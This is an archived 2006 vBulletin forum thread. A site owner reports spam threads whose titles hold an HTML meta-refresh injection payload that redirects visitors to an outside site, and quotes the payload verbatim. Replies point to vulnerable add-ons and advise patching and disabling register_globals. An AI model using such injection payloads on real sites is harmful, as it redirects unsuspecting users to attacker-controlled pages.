Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 09-04-2006, 04:11 AM
teedizz teedizz is offline
 
Join Date: Jan 2004
Posts: 275
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default My site is Also being hacked

basically, thier doing nothing to tha forum itself, I mean they have no direct access to my server or they would wipe everything...new users are registering & just creating a thread with a title like

">"">>>><meta http-equiv="Refresh" content="0;url=http://myturqey.com/a.htm"> """" >

then for some reason my sites starts to re-direct....after i delete the thread, everything is fine. I do have top x-stats installed so ill try updating that but i was reading the other thread & really seen sooo many suggestions but no definates...so what stops this? I have 3.5.2 installed

Also, is this problem fixed for 3.6?
Reply With Quote
  #2  
Old 09-04-2006, 11:53 AM
Wild-Wing Wild-Wing is offline
 
Join Date: Dec 2005
Posts: 86
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

go here and read this this takes care of it pememntly http://www.tutorialtomb.com/forum/sh...ad.php?t=13986
Reply With Quote
  #3  
Old 09-05-2006, 05:39 PM
KW802's Avatar
KW802 KW802 is offline
 
Join Date: Jul 2003
Location: A galaxy far, far away...
Posts: 1,450
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

What version of vB are you using? On my vB 3.5.x and vB 3.6.0 sites with HTML turned off those threads had no affect.
Reply With Quote
  #4  
Old 09-05-2006, 06:54 PM
Guest190829
Guest
 
Posts: n/a
Default

Quote:
Originally Posted by teedizz
basically, thier doing nothing to tha forum itself, I mean they have no direct access to my server or they would wipe everything...new users are registering & just creating a thread with a title like

">"">>>><meta http-equiv="Refresh" content="0;url=http://myturqey.com/a.htm"> """" >

then for some reason my sites starts to re-direct....after i delete the thread, everything is fine. I do have top x-stats installed so ill try updating that but i was reading the other thread & really seen sooo many suggestions but no definates...so what stops this? I have 3.5.2 installed


Also, is this problem fixed for 3.6?
It is the TOP x-stats that is doing this. If you did click install, you should have recieved an Official staff update concerning it. I suggest downloading the latest version which fixes the issue...
Reply With Quote
  #5  
Old 09-05-2006, 09:35 PM
OnkelM's Avatar
OnkelM OnkelM is offline
 
Join Date: Apr 2006
Posts: 9
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by teedizz
I have 3.5.2 installed
Also, is this problem fixed for 3.6?
Before you do the Update to Version 3.6 pls check your Server for your Configs cause you maybe cannot install it due the php- and mysql Version it needs...!

I've update my vb last night 2 Version 3.5.5. and it works all fine! Maybe you should do an update too 4 more safety...

Greets the Onkel
Reply With Quote
  #6  
Old 09-05-2006, 09:42 PM
The Finman's Avatar
The Finman The Finman is offline
 
Join Date: Jun 2006
Posts: 78
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by Danny.VBT
It is the TOP x-stats that is doing this. If you did click install, you should have recieved an Official staff update concerning it. I suggest downloading the latest version which fixes the issue...
Danny, you all might want to mention to people that if they have a "test" board installed to test out upgrades or hacks before installing them on their live board, that if they have Cyb-Avanced Forumhome Stats, Top "X" Stats and ESPECIALLY if they have any version of FlashChat before the new patched 4.6.2 on their test board that they are still vulnerable if these kiddies find their unpatched version of their test forums. I've seen this happen alot with people that have patched their live boards, but forgot to do so on their test boards.
Reply With Quote
  #7  
Old 09-05-2006, 09:56 PM
Paul M's Avatar
Paul M Paul M is offline
 
Join Date: Sep 2004
Location: Nottingham, UK
Posts: 23,748
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

JFYI - it is only possible for a hacker to use the Flashchat exploit if you are running your server with "register_globals" set to "on" (in PHP) - since this is a security issue in itself, anyone who can, should turn that option off in their php.ini
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 12:37 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.03989 seconds
  • Memory Usage 2,217KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (3)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (7)post_thanks_box
  • (7)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (7)post_thanks_postbit_info
  • (7)postbit
  • (6)postbit_onlinestatus
  • (7)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete